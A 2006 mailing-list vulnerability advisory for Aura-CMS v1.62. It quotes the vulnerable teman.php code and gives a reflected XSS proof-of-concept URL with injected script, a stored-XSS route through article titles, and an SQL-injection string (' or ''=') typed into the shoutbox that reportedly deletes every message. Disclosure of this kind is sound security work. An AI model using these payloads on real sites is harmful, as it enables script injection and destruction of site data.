<<< Date Index >>>     <<< Thread Index >>>

lintah_|adv|_01@2006>=========<[Aura-CMS v1.62]<===>[XSS vulnerable]&[bug]

by : iFX a.k.a inversFX
 _______________________________
[       apem-zigzag@xxxxxxxxxx  ]
[       inversfx@xxxxxxxxx      ]
 -------------------------------
locate : Indonesia, Jakarta
--------------------------------
date   : 29/06/2006
--------------------------------
title  : XSS on `CMS Aura v1.62`
--------------------------------
Developer CMS : Arif Supriyanto - arif@xxxxxxxxxxxxxxxx
                http://www.auracms.tk
                http://www.semarang.tk
                http://www.ayo.kliksini.com
                http://www.auracms.opensource-indonesia.com
--------------------------------


PoC :
--------------------------------------------------------------------

1.  in 'teman.php' we can see the code :

.....
echo "<p class=judul>Kirim ke Teman</p>
<p class=konten>Anda ingin memberitahu teman Anda tentang artikel ini yang berjudul 
: <b>$judul_artikel</b>.";
.....

        
        we found something here, that's variable $judul_artikel
        so we can xss from the url :


        1st ex:
http://localhost/teman.php?judul_artikel=<script>alert("mati dah gwa!!!")</script> 

        2nd ex:
or we can send an artikel to admin and the title had the XSS code, so when anonymous is 
        opening the index.php, the script are running.
---------------------------------------------------------------------
2. we found something here that can be delete all shoutbox message. as usually we can shout anonymously with fake name, mail, pesan. 
        here when I insert
name = ' or ''=' <== old SQL injection code mail = test_string <== you can fill it with free mail address 
pesan = ' or ''='                       <== old SQL injection code
then all message on it clear amazingly.... 



----------------------------------------------------------------------
screen shot :
http://h1.ripway.com/lintah/adv/img/01-iFX-2006-AuraCMS-v1.62-XSS.bmp
origin :
http://h1.ripway.com/lintah/adv/txt/01-iFX-2006-AuraCMS-v1.62-XSS-Bug.txt
----------------------------------------------------------------------

sory for my words In English, cuz I often REMED!!!
                                                                   
_________________
/Shout :| |X| 
-------------------------------------------------------------------------------------
|ECHO's kommunity & Staff, Kecoak kommunity, Jasakom kommunity, all hacker kommunity| |$pecial to : cR45H3R, Dr.Pluto, he4rt_bre4ker, bius, ||||||||. | |Lintah{ iFX, BlueJaccker, Sin~X, Xploid, frezZe, Shock-3d, G4mMa, Big_Red_One } | 
-------------------------------------------------------------------------------------
                                                               |OK | Apply | 
Cancel |
                                                               
----------------------
========================================================================================
Simak preview pertandingan piala dunia 2006 di http://telkom.net/pialadunia/
Asah pengetahuanmu tentang Piala Dunia di http://netkuis.telkom.net/pialadunia/ ========================================================================================